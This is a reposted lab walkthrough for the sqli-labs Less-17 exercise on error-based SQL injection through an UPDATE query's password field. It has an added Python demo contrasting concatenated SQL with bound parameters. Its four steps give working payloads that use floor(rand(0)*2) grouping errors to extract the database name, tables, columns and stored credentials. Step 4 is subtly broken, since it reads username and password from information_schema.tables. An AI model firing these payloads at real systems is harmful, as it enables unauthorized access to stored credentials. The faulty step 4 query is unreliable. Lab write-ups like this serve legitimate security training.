sqli-labs less17 update query-error based


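Background: logical or and logical and

    (1) a or b: if a is true, b does not matter and the result is true.

    (2) a and b: if a is false, b does not matter and the result is false.

    (3) Precedence: equals sign > and > or.

  Application:

    (1)

update users set password='' or 0 where username='admin' (the three columns shown in the original post's screenshots are id, username, password)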


    (2)

update users set password='1234' or 0 where username='admin'


    (3)

update users set password='' and 1 where username='admin'


    (4)

update users set password='1234' and 1 where username='admin'
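
Added example, not part of the original post: the four statements above run against a constructed in-memory table, next to the same inputs passed as a bound parameter. SQLite is used here as an assumed stand-in for the lab's MySQL, and the function names and the sample row are made up for the illustration.

```python
import sqlite3

def fresh_db():
    # Constructed sample table with the three columns id, username, password.
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer primary key, username text, password text)")
    db.execute("insert into users (username, password) values ('admin', 'secret')")
    return db

def stored_password(db):
    return db.execute("select password from users where username='admin'").fetchone()[0]

def update_concat(new_password):
    """Vulnerable pattern: the input is spliced into the SQL text."""
    db = fresh_db()
    db.execute("update users set password='" + new_password + "' where username='admin'")
    return stored_password(db)

def update_bound(new_password):
    """Hardened pattern: the input is bound as a parameter and stays data."""
    db = fresh_db()
    db.execute("update users set password=? where username='admin'", (new_password,))
    return stored_password(db)

# Inputs that turn the concatenated statement into cases (1)-(4) above.
# Each carries its own where clause and ends with "-- " so that the quote
# and where clause appended by the application are commented out.
CASES = [
    "' or 0 where username='admin'-- ",
    "1234' or 0 where username='admin'-- ",
    "' and 1 where username='admin'-- ",
    "1234' and 1 where username='admin'-- ",
]

def compare():
    # (input, value stored by concatenation, value stored by binding)
    return [(p, update_concat(p), update_bound(p)) for p in CASES]

if __name__ == "__main__":
    for payload, concat, bound in compare():
        print(f"{payload!r:42} concatenated -> {concat!r:4} bound -> {bound!r}")
```

With concatenation the column receives the result of the boolean expression; with a bound parameter it receives the submitted text unchanged, so the or/and never reaches the SQL parser.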


Walkthrough:

1. Get the database name

' or (select count(*) from information_schema.tables group by concat_ws('-',(select database()),floor(rand(0)*2))) where username='admin'-- // do not forget the space after --
or
1234' and (select count(*) from information_schema.tables group by concat_ws('-',(select database()),floor(rand(0)*2))) where username='admin'-- 


2. Get the tables in the security database

' or (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))) where username='admin'-- 
or
1234' and (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema='security'),floor(rand(0)*2))) where username='admin'-- 


3. Get the columns of the users table

' or (select count(*) from information_schema.tables group by concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),floor(rand(0)*2))) where username='admin'-- 


4. Get the usernames and passwords in users

' or (select count(*) from information_schema.tables group by concat_ws('-',(select concat_ws('-',username,password) from information_schema.tables where table_name='users' limit 0,1),floor(rand(0)*2))) where username='admin'-- 


Reposted from: https://www.cnblogs.com/jielun/p/11001475.html

Source: weixin_30595035, republished by 架构君 at https://javajgs.com/archives/29762
